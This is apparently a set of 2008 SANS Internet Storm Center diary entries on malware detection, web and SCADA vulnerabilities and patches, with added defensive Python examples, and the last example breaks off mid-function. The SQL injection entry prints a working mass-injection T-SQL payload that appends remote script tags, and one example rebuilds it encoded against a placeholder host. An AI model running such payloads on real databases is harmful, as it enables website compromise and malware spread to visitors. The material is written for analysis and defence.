Malware development and usage is a rapidly growing area of concern.  Sadly, the developers of malware are getting better and better at fine tuning their craft.  Malware today is very sophisticated with amazing GUI interfaces that make it so easy anyone can use it with no skills required.  It is too easy to create malware that is not detected by antivirus software.  Sadly, by the time the malware is found and detection is provided many days may have passed.  Take Slammer for instance and the fact it infected the majority of the 75,000 systems it compromised within the first ten minutes.  How do you get a signature out to detect something that moves that fast?  The answer is simple...you can't!!

The use of signature-based detection has its limitations, and developments in behavioral and heuristic-based approaches aren't where they need to be yet.  This is not a slam against any antivirus vendors.  I'm simply advocating that we need to take the blinders off and look at other ways we can do detection to increase our security posture.  Just to clarify, I use the term "forensics" because I look at forensics as the art of looking for clues.  That is really what you're doing in all of these: looking for clues that would help you spot malware.  Call it whatever you want :>)  Here are some things that can be used to monitor for malware. 

Network Forensics
Network forensics is a method to examine the characteristics of your network traffic and provide early warning.  One of the guiding principles when doing any type of analysis is to learn what is normal.  If you learn what is normal, the abnormal will immediately stand out to you.  All network traffic has patterns that are unique to that network.  By watching your network traffic, you can determine rapidly what is abnormal.  With network speeds today, one of the best methods of doing this is graphical analysis.  There are many tools out there that will graphically display your communication flows.  You can visually see where your traffic is going, and abnormal traffic patterns instantly stand out.  For instance, if you're watching your connections and suddenly 2 boxes, then 10, then 20, etc. all start trying to connect to an IP address that is not part of their normal pattern, you would want to check that out.  If it's malware related, you will be able to find out very quickly and provide protection for your network.  With visual monitoring, abnormalities stand out very quickly. 
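As an added example (not code from the diary or from any ISC tool) of the "learn what is normal" approach in Python: a baseline of destination/port pairs is learned from a quiet period, then for destinations never seen before the number of distinct internal hosts reaching them is counted per five-minute interval, and the "2 boxes, then 10, then 20" pattern is flagged. The flow records, host names and addresses are constructed, not a real capture.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records (not a real capture): "timestamp src dst dport", one per line.
# The learning set is what "normal" looked like on a quiet day.
LEARNING_FLOWS = """\
2008-06-13T10:00:00 10.0.0.5 10.0.0.1 53
2008-06-13T10:01:00 10.0.0.6 10.0.0.1 53
2008-06-13T10:02:00 10.0.0.7 192.0.2.10 80
"""


def synth_burst(dst, dport, start, hosts_per_bucket, step_minutes=5):
    """Construct the diary's scenario: 2 boxes, then 10, then 20 all reaching
    the same never-before-seen destination in successive intervals."""
    lines = []
    for i, n in enumerate(hosts_per_bucket):
        ts = start + timedelta(minutes=i * step_minutes)
        for h in range(1, n + 1):
            lines.append(f"{ts.isoformat()} 10.0.0.{h} {dst} {dport}")
    return "\n".join(lines) + "\n"


TODAY_FLOWS = (
    "2008-06-14T09:00:00 10.0.0.5 10.0.0.1 53\n"        # normal DNS, in the baseline
    "2008-06-14T09:01:00 10.0.0.3 198.51.100.7 443\n"   # new destination, but one host
    "2008-06-14T09:20:00 10.0.0.3 198.51.100.7 443\n"
    + synth_burst("203.0.113.99", 8080, datetime(2008, 6, 14, 9, 0), [2, 10, 20])
)


def parse_flows(text):
    flows = []
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def learn_baseline(flows):
    """'Normal' for this detector: every destination/port pair seen while learning."""
    return {(dst, dport) for _, _, dst, dport in flows}


def fan_in_series(flows, baseline, bucket_minutes=5):
    """For destinations NOT in the baseline, count distinct internal sources per
    time bucket and return the counts in time order."""
    buckets = defaultdict(lambda: defaultdict(set))
    for ts, src, dst, dport in flows:
        if (dst, dport) in baseline:
            continue
        bucket = ts.replace(minute=ts.minute - ts.minute % bucket_minutes,
                            second=0, microsecond=0)
        buckets[(dst, dport)][bucket].add(src)
    return {key: [len(per[b]) for b in sorted(per)] for key, per in buckets.items()}


def spreading_destinations(series, min_hosts=2):
    """Flag a new destination whose distinct-source count keeps climbing across
    consecutive buckets and ends at min_hosts or more: the pattern of something
    spreading inside the network rather than one user visiting a new site."""
    hits = []
    for key, counts in series.items():
        growing = len(counts) >= 2 and all(b > a for a, b in zip(counts, counts[1:]))
        if growing and counts[-1] >= min_hosts:
            hits.append((key, counts))
    return hits


def run(learning_text=LEARNING_FLOWS, today_text=TODAY_FLOWS):
    baseline = learn_baseline(parse_flows(learning_text))
    return spreading_destinations(fan_in_series(parse_flows(today_text), baseline))


if __name__ == "__main__":
    for (dst, dport), counts in run():
        print(f"check {dst}:{dport}: distinct sources per 5 min = {counts}")
```

The single host talking to a new site twice is not flagged; the destination that more and more hosts suddenly reach is.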

Web traffic Forensics
I also recommend doing forensics on your web traffic.  The same methodology applies: look for the abnormalities in your traffic.  Since port 80 is open, it's a good target.  I wrote a diary a while back on a piece of undetected malware that used a covert channel over port 80 to get its commands.  Forensics on your web traffic would have spotted that site suddenly showing up at repeated intervals in your analysis.

Host Based Forensics
You should know what the basic build is for all your systems.  Using a good tool to alert you to changes is another method of early detection.  You can also do forensics on your logs by monitoring for key events such as services starting or new processes being added.  You can run a local script at night on each system to send you a list of the services and processes running on it.  That can be automated to be compared against a known list, with the outliers written to a file for further analysis.  (Note: I recommend at night because the systems will be more stable as to what is running.)
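The nightly inventory comparison described above, as an added Python example (not the diary's script; the CSV report format, host names and service names are constructed assumptions): each host's list of services and processes is compared against the known build, and the outliers, including baseline items that disappeared or changed state, are written to a file for the morning review.

```python
import csv
import io
from collections import defaultdict

# Constructed report format (not the output of any particular tool): the nightly
# script on each host emits one CSV line per service or process: host,kind,name,state
BASELINE_REPORT = """\
host,kind,name,state
ws01,service,W32Time,running
ws01,service,AVService,running
ws01,process,explorer.exe,running
ws02,service,AVService,running
ws02,process,explorer.exe,running
"""

TONIGHT_REPORT = """\
host,kind,name,state
ws01,service,W32Time,running
ws01,service,AVService,stopped
ws01,process,explorer.exe,running
ws01,process,svchost32.exe,running
ws02,service,AVService,running
ws02,service,RemoteHelper,running
"""


def parse_report(text):
    """Return {host: {(kind, name): state}} from the CSV report text."""
    inventory = defaultdict(dict)
    for row in csv.DictReader(io.StringIO(text)):
        inventory[row["host"]][(row["kind"], row["name"])] = row["state"]
    return inventory


def compare_to_baseline(baseline, tonight):
    """Three kinds of outlier worth a look: items that were never in the build ("new"),
    baseline items that are gone ("missing"), and items whose state changed
    ("changed", e.g. the antivirus service no longer running)."""
    findings = []
    for host in sorted(set(baseline) | set(tonight)):
        known, seen = baseline.get(host, {}), tonight.get(host, {})
        for kind, name in sorted(seen.keys() - known.keys()):
            findings.append((host, "new", kind, name, seen[(kind, name)]))
        for kind, name in sorted(known.keys() - seen.keys()):
            findings.append((host, "missing", kind, name, known[(kind, name)]))
        for kind, name in sorted(known.keys() & seen.keys()):
            if known[(kind, name)] != seen[(kind, name)]:
                findings.append((host, "changed", kind, name,
                                 f"{known[(kind, name)]}->{seen[(kind, name)]}"))
    return findings


def write_findings(path, findings):
    """Write the outliers to a CSV file for further analysis; returns the count."""
    with open(path, "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(["host", "finding", "kind", "name", "detail"])
        writer.writerows(findings)
    return len(findings)


def run(baseline_text=BASELINE_REPORT, tonight_text=TONIGHT_REPORT):
    return compare_to_baseline(parse_report(baseline_text), parse_report(tonight_text))


if __name__ == "__main__":
    for finding in run():
        print(*finding, sep="\t")
```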

The bottom line is to think outside the box and be creative (with permission of course)!!  Set up a Darknet, use LaBrea on an unused network space in your environment, watch for increased traffic to certain ports or whatever comes to mind.  Just don't depend on your antivirus to be your only solution for detection of malware.  We all need to move toward being proactive and not reactive.  If you have implemented something to help look for malware, please let us know and we'll combine the methods and update the diary.

Happy Hunting!


Published: 2008-06-13

Floods: More of the same (2)

As expected, we do see a number of domain name registrations referencing the floods and tornados in Iowa. At this point, we haven't seen any obvious donation scams. Most of the domains are just parked; others offer news summaries and appear to try to make some money with Google ads. Please let us know if you run into any scams. As usual, please donate to reputable organizations. Try to avoid organizations you have never heard of before.

The IRS offers a database of tax exempt charities here: http://www.irs.gov/charities/article/0,,id=96136,00.html


Johannes B. Ullrich Ph.D. , CTO SANS Internet Storm Center


Published: 2008-06-13

Podcast Episode Six

Just a quick note to let everyone know that we put out Podcast Episode 6 this morning; we tried to go alphabetically through all the topics (and there were a bunch).   Larry Pesce of PaulDotCom Security Weekly was able to join us mid-show.

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.

As always we are looking for listener feedback, be sure and write in!


Joel Esler



Published: 2008-06-13

SQL Injection: More of the same

We continue to receive more reports of SQL injection attacks, using updated URLs. One of the "neat" features of this exploit is how it uses one single SQL statement which pulls all the necessary information from the database itself. Here is the latest version (thanks Jakub for submitting this!):


We have looked at these before. But let me re-iterate step by step what exactly is happening here:
First of all, we have a bit of URL encoding here. The "%20" represents a space. This turns the SQL statement into:


First a variable '@S' is declared as a "varchar" (comparable to a "string" in other languages) with a length of 4000 characters. Then, the output of 'CAST' is assigned to the variable. CAST is just used to turn the long hex string into a "varchar".

Bojan told us in an earlier diary how to convert the hex string using Perl. In this case, we end up with the following (I slightly modified the included URL by adding spaces and turning http into hxxp; we had issues in the past with proxies flagging our diaries as "malicious"):

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=hxxp://www. adsitelo .com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

Let's go over this line by line:

First, two variables (T and C) are declared:

DECLARE @T VARCHAR(255),@C VARCHAR(255)

Next, we declare a "Table_Cursor". A table cursor receives the output of a query row by row; it is essentially a "for" loop over all results returned by the query. The cursor is defined for the following query:

DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

This SQL query uses one particular trick: sysobjects is a system table in SQL Server that lists all the other tables available. syscolumns works similarly for all columns found in these tables.

The query selects all "objects" with an xtype of "u". These are tables created by the user; system tables (like "sysobjects" and "syscolumns") are ignored. Next, it limits the result to columns of type 99 (ntext), 35 (text), 231 (sysname) and 167 (varchar). These are datatypes that can hold a string of characters.

Our "cursor" will now retrieve all the results and assign them to the variables "T" (table name) and "C" (column name).

Update: initially I posted the script part wrong. A couple of readers pointed out that it was actually not escaped right. Our diary editor doesn't escape that on purpose, as handlers sometimes need to add HTML/JavaScript/CSS to make a diary "work"... well, luckily I at least escaped the script part... stuff happens.

The next SQL statement uses these variables:

BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+
''<script src=hxxp://www. adsitelo .com/b.js></script>''')

For every row in each of these columns, the malicious JavaScript is appended to the existing value (CONVERT turns the column into a VARCHAR so it can be concatenated, and RTRIM strips trailing whitespace first). As a result, you will see the JavaScript littered throughout the application. Wherever the website is using a string from the database, the JavaScript is now added. You frequently see it as part of the title tag.

Finally: How to defend against this? The "simple" answer is of course to just not have any SQL injection faults. But that's easier said than done, in particular for an existing legacy application. A couple of other things you can do:

  • Limit the database user the web application uses. Maybe it doesn't have to update anything, or only a few tables.
  • Monitor your web application for SQL errors. These statements may create some errors if your web application doesn't have sufficient privileges.
  • Keep a close eye on your data and your application. Look for new JavaScript in titles and other spots that shouldn't have any.
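To triage a request like this from a web server log, here is an added Python example (not the diary's Perl or any ISC code): it URL-decodes the query string, pulls the hex out of the CAST(... AS VARCHAR) wrapper (and also handles the NVARCHAR variant of the same trick, where the hex is UTF-16), decodes it and extracts the script URL; a second helper scans exported database values for script tags, as the last bullet suggests. The sample request and the script host are constructed placeholders, not the ones from the diary.

```python
import re
from urllib.parse import unquote

# Constructed sample, not a captured request: the decoded SQL the diary walks through,
# re-encoded the way the injected request carries it (hex inside CAST(... AS VARCHAR),
# spaces as %20). The script host is a placeholder, not the one from the diary.
INNER_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) "
    "BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+"
    "''<script src=http://malicious.example/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_QUERY = (
    "id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + INNER_SQL.encode("latin-1").hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S);--"
)

CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'>\s]+)", re.IGNORECASE)


def decode_cast_payload(query):
    """Return the SQL hidden in a CAST(0x... AS VARCHAR/NVARCHAR) wrapper, or None."""
    # unquote, not unquote_plus: the '+' signs in the payload are T-SQL concatenation.
    decoded = unquote(query)
    match = CAST_RE.search(decoded)
    if not match or len(match.group(1)) % 2:
        return None
    raw = bytes.fromhex(match.group(1))
    # NVARCHAR variants carry the statement as UTF-16LE (each ASCII byte followed by 0x00).
    return raw.decode("utf-16-le" if match.group(2).upper() == "N" else "latin-1")


def extract_script_sources(text):
    """All <script src=...> URLs in a piece of SQL, HTML or a database value."""
    return SCRIPT_SRC_RE.findall(text)


def defang(url):
    """Neutralize a URL for a report, in the spirit of the diary's hxxp convention."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.lower().replace("http", "hxxp", 1) + sep + host.replace(".", "[.]") + slash + path


def find_injected_values(rows):
    """Scan (table, column, value) triples exported from the application's database
    for script tags that should never be in a product name or page title."""
    return [(table, column, src) for table, column, value in rows
            for src in extract_script_sources(str(value))]


def triage(query):
    """Summarize one suspicious request taken from the web server log."""
    sql = decode_cast_payload(query)
    if sql is None:
        return {"decoded": False}
    return {"decoded": True, "sql": sql,
            "script_sources": [defang(u) for u in extract_script_sources(sql)]}


if __name__ == "__main__":
    result = triage(SAMPLE_QUERY)
    print(result["sql"][:80] + "...")
    print("injected script sources:", result["script_sources"])
```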

And finally: At SANSFIRE, we will debut our new class, SEC522 "Defending Web Applications". It's an updated version of SEC519 ("Web Application Security") and now covers web services and other new topics.

Johannes B. Ullrich Ph.D. , CTO SANS Internet Storm Center


Published: 2008-06-12

Safari on Windows - not looking good

Last month Mark posted a diary about a security issue for users using Safari on Windows. There has been a lot of discussion about this over the past few weeks. The issue is not a typical security vulnerability in a product, but a blended threat that is specific for Safari on Windows – a combined attack called "Safari Carpet Bomb".

Over the last weekend, a security researcher released proof of concept code that exploits this "feature" in Safari with another "feature" in Windows (yeah, a lot of "features" working together = a vulnerability).

The two "features" we're talking about here are these:

  1. In some cases, Internet Explorer will load DLLs from Desktop. This is an old "feature" that has been known since December 2006. It also works, as far as I'm aware, only with Internet Explorer 7 (and probably 8 beta) on Windows XP. My tests failed on Vista.
  2. Safari for Windows will, by default, save files on Desktop. This would not normally be a problem, but Safari does that without any prompts to the user (Firefox does the same, for example, but prompts the user before saving the file).

Now, when we combine these two vulnerabilities you get the following: a user visits a malicious web site with Safari. The web site causes Safari to automatically download the DLL file and store it on the Desktop. The user now needs to open Internet Explorer from the Desktop in order for the DLL file to be executed automatically. Keep in mind that the shortcut to Internet Explorer has to be on the Desktop so that the PATH environment variable gets defined accordingly (it will make Internet Explorer search the current directory for the DLL file).

Overall, the sky isn't falling, but in my opinion both Microsoft and Apple (Safari) should fix these "features". I don't see a reason why Internet Explorer would look for the DLL file in the current directory (this would effectively prevent this vulnerability). Apple should also fix Safari so it at least prompts the user before downloading the file. Apple already said that they don't consider this to be a security issue (which is partially correct), but since other browsers do this (at least Firefox and Internet Explorer), and it is good security practice, my humble opinion is that Apple should change this behavior.

Since the proof of concept is easily available, if you are using Safari on Windows please change the default download location as described in Microsoft's advisory available at http://www.microsoft.com/technet/security/advisory/953818.mspx.




Published: 2008-06-11

OpenOffice 2.4.1 Out - Fixes One Vuln

OpenOffice has released 2.4.1, which fixes a heap overflow problem that allows attackers to craft malicious OpenOffice documents that can execute arbitrary code.  (See their bulletin.) The vulnerability is complicated by the platform-independent nature of OpenOffice, but that just means someone has to write several versions of malicious files to infect a variety of operating systems.  Advice is, as always, update to the latest version.

John Bambenek / bambenek \at\ gmail |dot| com


Published: 2008-06-11

CitectSCADA Buffer Overflow Vulnerability

CORE Security has posted an alert on a vulnerability in the CitectSCADA product that allows remote attackers to execute a buffer overflow against its ODBC service.  The CitectSCADA product is used to collect information from SCADA devices and provide an interface to manage those underlying devices.  You can get an idea where CitectSCADA fits in the overall scheme of a SCADA system by taking a look at their product page.  Basically, the CitectSCADA product monitors and manages the hardware, and this vulnerability in the worst-case scenario could be used to shut down or take over such hardware.  This vulnerability also affects CitectFacilities.  The latest versions of both software packages are vulnerable.

The main mitigating factor of this vulnerability is that such systems should not be connected to corporate networks nor the internet.  Citect certainly recommends that these services be on a contained network, and that makes sense for most systems of this type.  In the case of a system that is plugged into a "live" or accessible network, an attacker would still need to connect to the TCP port that managed the ODBC service.  Firewalls and/or ACLs would prevent such attacks as well (the best firewall being an air gap, of course. ;)  The last mitigating step is to turn off the ODBC service if it is not used in an environment.

Assuming that a remote attacker could reach out and touch the service, they could perform a buffer overflow attack without authentication.  At this time, a patch does not appear to be available, nor is there a statement on Citect's website that I have found.  According to press reports, a patch was available last week and the vulnerability has been known to Citect for five months.  There is no information about how many have applied the patch, but of course, if you run these systems, patch them.

COMMENTARY:  Buffer overflows are well known and there are many tools to help software developers find them in an automated fashion.  I have a hard time giving Citect the benefit of the doubt in this, especially with the stakes so high in SCADA systems.  There is no reason such a vulnerability should make it out the door into production.

John Bambenek / bambenek \at\ gmail |dot| com




Published: 2008-06-10

Linux ASN.1 BER kernel buffer overflow

Basic Encoding Rules (BER) is an encoding format in ASN.1. The Linux kernel implementation has a buffer overflow in it allowing a kernel compromise. It affects the CIFS and ip_nat_snmp_basic modules.

Updates available in Linux

More information:

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

SNMP v3 trouble

SNMP typically isn't the most loved protocol when it comes to security; most of this stems from the older versions.  The current version (SNMPv3) has a way to do authentication using a keyed-Hash Message Authentication Code (HMAC).

It seems CERT is coordinating a vulnerability regarding this: "Implementations of SNMPv3 may allow a shortened HMAC code in the authenticator field to authenticate to an agent or a trap daemon using a minimum HMAC of 1 byte." Which obviously isn't the right thing to do.
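To make the CERT note concrete, here is an added Python example (not code from the advisory or from any SNMP implementation): a verifier with the truncation flaw next to the strict check an agent or trap daemon should perform. The key and message bytes are constructed placeholders; the 12-octet length is the HMAC-96 truncation SNMPv3's User-based Security Model uses.

```python
import hashlib
import hmac

# USM truncates the HMAC to 12 octets (HMAC-MD5-96 / HMAC-SHA-96, RFC 3414), so a valid
# msgAuthenticationParameters field is always exactly 12 bytes long.
AUTH_PARAM_LEN = 12

# Constructed values, not from a real device: a localized authentication key and the
# serialized SNMPv3 message with its authentication field zeroed (the HMAC input).
AUTH_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef01234567")
MESSAGE = b"\x30\x2a\x02\x01\x03" + b"\x00" * 37   # placeholder wire bytes


def compute_auth_param(auth_key, message, digest=hashlib.sha1):
    """The 12-octet authenticator a sender puts in msgAuthenticationParameters."""
    return hmac.new(auth_key, message, digest).digest()[:AUTH_PARAM_LEN]


def verify_truncating(auth_key, message, received):
    """The flawed pattern behind the CERT note: compare only as many bytes as the
    peer supplied. A 1-byte field then passes for 1 value out of 256, so guessing
    the authenticator takes at most 256 attempts instead of 2**96."""
    expected = compute_auth_param(auth_key, message)
    return len(received) > 0 and received == expected[:len(received)]


def verify_strict(auth_key, message, received):
    """What an agent or trap daemon should do: refuse any authenticator that is not
    exactly 12 octets, then compare in constant time."""
    if len(received) != AUTH_PARAM_LEN:
        return False
    return hmac.compare_digest(received, compute_auth_param(auth_key, message))


def one_byte_acceptance(verify):
    """How many of the 256 possible 1-byte authenticators a verifier accepts."""
    return sum(1 for b in range(256) if verify(AUTH_KEY, MESSAGE, bytes([b])))


if __name__ == "__main__":
    print("truncating verifier accepts", one_byte_acceptance(verify_truncating), "of 256 one-byte tags")
    print("strict verifier accepts", one_byte_acceptance(verify_strict), "of 256 one-byte tags")
```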

Cisco has a security advisory on the topic, as will other vendors without much doubt.

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

June 2008 Black Tuesday Overview

Overview of the June 2008 Microsoft patches and their status. For each bulletin we list the affected component, a description, the KB article, known exploits, Microsoft's rating and the ISC rating (*) for clients and servers.

MS08-030 - Bluetooth stack
A vulnerability in the Bluetooth stack allows code execution when a large number of SDP (Service Discovery Protocol) requests are made.
KB 951376 | No publicly known exploits | Microsoft: Critical | ISC clients: Critical | ISC servers: Important

MS08-031 - MSIE
Multiple vulnerabilities in MSIE allow code execution and cross-domain information leaks. The memory corruption gives access to the same rights as the logged-on user has. The vulnerability in parsing headers allows for HTTP Request Splitting, HTTP Request Smuggling and more (see CVE-2008-1544 for more details). Replaces MS08-024.
KB 950759 | Details on attacking CVE-2008-1544 are publicly available | Microsoft: Critical | ISC clients: PATCH NOW | ISC servers: Important

ActiveX Kill Bits (Speech API)
A vulnerability in the Speech API accepts commands sent to it over the speakers of the computer, allowing an attacker access to the same rights as the user has. Speech recognition must be enabled for this to work. Replaces MS08-023.
KB 950760 | Publicly discussed | Microsoft: Moderate | ISC clients: Important | ISC servers: Less Urgent

DirectX
Multiple input validation vulnerabilities allow code execution in DirectX. Affected are MPEG streams in ASF and AVI files and parameters of SAMI (Synchronized Accessible Media Interchange) files. Replaces MS07-064.
KB 951698 | No publicly known exploits | Microsoft: Critical | ISC clients: Critical | ISC servers: Important

WINS
Privilege escalation vulnerability in WINS allows an attacker to gain complete control of a vulnerable system by sending crafted packets to the WINS server. Replaces MS04-045.
KB 948745 | No publicly known exploits | Microsoft: Important | ISC clients: Less Urgent | ISC servers: Critical

Active Directory
Input validation failure in the LDAP implementation that is part of AD leads to a Denial of Service. Replaces MS08-003.
KB 953235 | No publicly known exploits | Microsoft: Important | ISC clients: Less Urgent | ISC servers: Critical

PGM (Pragmatic General Multicast)
Multiple input validation failures in PGM packets allow a Denial of Service. PGM is active when MSMQ (Microsoft Message Queuing) is installed on a system. Replaces MS06-052.
KB 950762 | No publicly known exploits | Microsoft: Important | ISC clients: Important | ISC servers: Important

We will update issues on this page for about a week or so as they evolve.
We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY.
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

VLC: needs upgrading too!

One of those little things your users might manage to get installed for themselves is VLC.

Well they too have a new release that passed by all too quietly in the last few days. Barry reminded us about it.

So VLC Media Player 0.8.6h is the one you want to upgrade to, it fixes "security vulnerabilities in the Mozilla and ActiveX plugins, in the libpng, libid3tag, libvorbis libraries and in the Speex codec."

From their release notes:


0.8.6g (source release):

Make sure you get security notices from even the smallest vendor or software maker whose software you use, or sooner or later you'll miss one of them getting its patch before you discover it's been exploited.

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

Upgrade to QuickTime 7.5

Apple released QuickTime 7.5 earlier, which, among other things, fixes a number of security bugs.

Apple's security improvements include fixes for:

  • CVE-2008-1581: PICT images can lead to a heap overflow and code execution
  • CVE-2008-1582: AAC coded media can lead to code execution
  • CVE-2008-1583: PICT images can lead to a heap overflow and code execution
  • CVE-2008-1584: Indeo video codec can lead to a stack buffer overflow and code execution - note the fix: "This update addresses the issue by not rendering Indeo video codec content."
  • CVE-2008-1585: handling of file: URLs in QuickTime files could lead to an attacker controlled application launch and code execution - note the fix: "This update addresses the issue by revealing files in Finder or Windows Explorer rather than launching them."

Swa Frantzen -- Gorilla Security


Published: 2008-06-10

Ransomware keybreaking

Some interesting bits about some new "ransomware". It's malware that encrypts the victim's data and asks that money be sent for the decrypting software. As such there would be nothing spectacularly new about it, were it not that the attacker seems to have used cryptography properly this time: RC4 for the bulk of the work and then a 1024-bit RSA public key to hide the RC4 key.

Well, so far it looks like the malware author upped the ante and made it harder for the AV world to beat him, especially since the largest RSA key ever to be publicly broken is only 663 bits long, not 1024 (which makes a huge difference!).

Kaspersky launched a project to ask for help in breaking the key. This would take about a year with millions of computers, so it's not something trivial to take on.

But there are a few problems here beyond the cryptographic challenge.

First, how do we know the attacker won't change the key before we're done? After all, it will take him merely minutes to swap the key in a new strain of his malware, and we're set for another year. This isn't a race we're going to win.

It gets worse when reading Eran Tromer's writing over at MIT:

How do we know this public key (or his next key, or the one after that) is a key the attacker actually has the matching private key for? How do we know for sure this key doesn't belong to somebody else, and that by giving out the private key to thwart the apparent attacker we're not actually helping him in his real attack against somebody else? This could be settled by having the attacker prove, through the right cryptographic trickery, that he actually has the private key.

But suppose we don't get the proof: how do we know it's not even far worse, and that this public key belongs to some infrastructure we rely on to keep things safe? Imagine the key belonging to a CA used to sign SSL certificates... we'd be causing a whole lot of damage by making such a secret key known. Imagine the key belonging to a bank's https site: it would become vulnerable to a MitM attack without the customers even having to click "next" on a warning when they connect (yeah, why browsers even allow you to do that is another story).

I'd propose old fashioned police work instead: follow the money, seize the private key (if he has it) and throw the criminal(s) in jail for a very long time.

Some links:

Swa Frantzen --- Gorilla Security


Published: 2008-06-09

So Where Are Those OpenSSH Key-based Attacks?

Last month, it was announced that there was a significant issue involving the Pseudo Random Number Generator (PRNG) on Linux distributions derived from Debian or Ubuntu.  This issue caused the keys used for secure transmissions via SSL or SSH (and other applications) to be very predictable.   If you missed out on these diary entries, please see the URLs below.

One of our readers contacted the handler on duty to see if we had seen any reports since then of active attacks concerning this attack vector.  The standard SSH port (22/tcp) has been at normal levels for the past several weeks with one exception (on May 27-28) per the data at Dshield.

The reader pointed us to a blog where it appears there is some activity originating from Debian or Ubuntu based attackers toward various servers.  Looking at the limited bit of information in the blog, I think it is most likely just run-of-the-mill brute force attacks which coincidentally originated from these particular Linux distros.  In my particular area, I have seen a drop in SSH based attacks and an increase in targeted phishing scams in the past month.

Seeing that there isn't a major uptick in the past week or so, I would suppose that the attackers are taking a slower and less noisy approach to attacking the SSH vector.  In any case, we are still interested in packet captures should any of you see attacks which seem out of the ordinary.
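For readers who want to tell a dictionary-style scan apart from a user mistyping a passphrase before sending us a capture, here is an added Python example (not from the diary, the blog it mentions, or DShield) that counts failed password logins per source address in OpenSSH's auth.log format. A burst of failures against many different usernames from one address is the run-of-the-mill brute force pattern; one failure followed by a success is usually a typo. The log lines are constructed and the addresses are from the RFC 5737 documentation ranges; the thresholds are assumptions to tune for your own hosts.

```python
import re
from collections import defaultdict

# Constructed sample lines in OpenSSH's auth.log format (not real data).
SAMPLE_AUTH_LOG = """\
May 27 03:12:01 web1 sshd[2231]: Failed password for invalid user admin from 192.0.2.10 port 51122 ssh2
May 27 03:12:03 web1 sshd[2233]: Failed password for invalid user oracle from 192.0.2.10 port 51130 ssh2
May 27 03:12:05 web1 sshd[2235]: Failed password for root from 192.0.2.10 port 51144 ssh2
May 27 03:12:07 web1 sshd[2237]: Failed password for invalid user test from 192.0.2.10 port 51150 ssh2
May 27 03:12:09 web1 sshd[2239]: Failed password for invalid user guest from 192.0.2.10 port 51161 ssh2
May 27 03:15:40 web1 sshd[2301]: Failed password for alice from 198.51.100.7 port 40001 ssh2
May 27 03:15:52 web1 sshd[2303]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
May 27 03:20:00 web1 sshd[2350]: Accepted password for bob from 203.0.113.5 port 33010 ssh2
"""

# "invalid user" is present when the username does not exist on the host.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def count_failures(log_text):
    """Return {ip: {"attempts": n, "users": set_of_usernames}} for failed
    password logins found in the given auth.log text."""
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set()})
    for line in log_text.splitlines():
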